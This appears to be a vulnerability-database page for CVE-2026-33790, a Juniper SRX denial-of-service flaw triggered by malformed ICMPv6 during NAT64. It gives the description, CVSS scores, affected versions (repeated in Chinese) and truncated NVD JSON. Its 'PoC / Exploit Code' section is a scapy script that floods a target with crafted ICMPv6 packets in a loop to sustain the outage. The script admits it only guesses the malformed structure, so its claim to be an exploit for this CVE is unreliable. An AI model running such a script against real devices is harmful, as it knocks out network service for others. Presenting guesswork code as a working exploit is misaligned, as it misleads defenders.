CVE-2026-33790

Description

An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. During NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart. This issue cannot be triggered using IPv4 nor other IPv6 traffic. This issue affects Junos OS on SRX Series: * all versions before 21.2R3-S10, * all versions of 21.3, * from 21.4 before 21.4R3-S12, * all versions of 22.1, * from 22.2 before 22.2R3-S8, * all versions of 22.4, * from 22.4 before 22.4R3-S9, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S3, * from 25.2 before 25.2R1-S2, 25.2R2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:srx320:-:*:*:*:*:*:*:* - NOT VULNERABLE

21.2R3-S10之前的所有版本

21.3的所有版本

21.4R3-S12之前的21.4版本

22.1的所有版本

22.2R3-S8之前的22.2版本

22.4的所有版本

22.4R3-S9之前的22.4版本

23.2R2-S6之前的23.2版本

23.4R2-S7之前的23.4版本

24.2R2-S3之前的24.2版本

24.4R2-S3之前的24.4版本

25.2R1-S2, 25.2R2之前的25.2版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

from scapy.all import *

# Target configuration
target_ip = "2001:db8::1"  # Replace with actual target IPv6
iface = "eth0"            # Replace with actual network interface

# Construct a malformed ICMPv6 packet
# Note: The specific malformed structure depends on the vulnerability details.
# This example uses an invalid type to simulate unusual conditions.
packet = IPv6(dst=target_ip) / ICMPv6Unknown(type=255, code=0) / Raw(load=b"A"*64)

print(f"Sending malformed ICMPv6 packet to {target_ip}...")

# Send the packet in a loop to sustain the DoS condition
try:
    send(packet, loop=1, inter=0.1, iface=iface)
except KeyboardInterrupt:
    print("Stopped.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33790
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33790
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33790/
[4] VulDB https://vuldb.com/cve/CVE-2026-33790
[5] https://kb.juniper.net/JSA107874

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33790", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:28.803", "lastModified": "2026-04-17T17:11:49.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition.\n\nDuring NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart.\n\nThis issue cannot be triggered using IPv4 nor other IPv6 traffic.\n\n\n\nThis issue affects Junos OS on SRX Series:\n * all versions before 21.2R3-S10,\n * all versions of 21.3,\n * from 21.4 before 21.4R3-S12,\n * all versions of 22.1,\n * from 22.2 before 22.2R3-S8,\n * all versions of 22.4,\n * from 22.4 before 22.4R3-S9,\n * from 23.2 before 23.2R2-S6,\n * from 23.4 before 23.4R2-S7,\n * from 24.2 before 24.2R2-S3,\n * from 24.4 before 24.4R2-S3,\n * from 25.2 before 25.2R1-S2, 25.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Amber", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.2", "matchCriteriaId": "331C0F12-D9B9-483B-9EF0-28E48ED8346D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*", "matchCriteriaId": "216E7DDE-453D-481F-92E2-9F8466CDDA3F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:*", "matchCriteriaId": "A52AF794-B36B-43A6-82E9-628658624B0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "3998DC76-F72F-4452-9150-652140B113EB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "36ED4552-2420-45F9-B6E4-6DA2B2B12870"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r2:*:*:*:*:*:*", "matchCriteriaId": "C28A14E7-7EA0-4757-9764-E39A27CFDFA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "4A43752D-A4AF-4B4E-B95B-192E42883A5B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "42986538-E9D0-4C2E-B1C4-A763A4EE451B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r3:*:*:*:*:*:*", "matchCriteriaId": "DE22CA01-EA7E-4EE5-B59F-EE100688C1DA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:21.2:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "E596ABD9-6ECD-48DC-B770-87B7E62EA345"}, {"vulnerable" ... (truncated)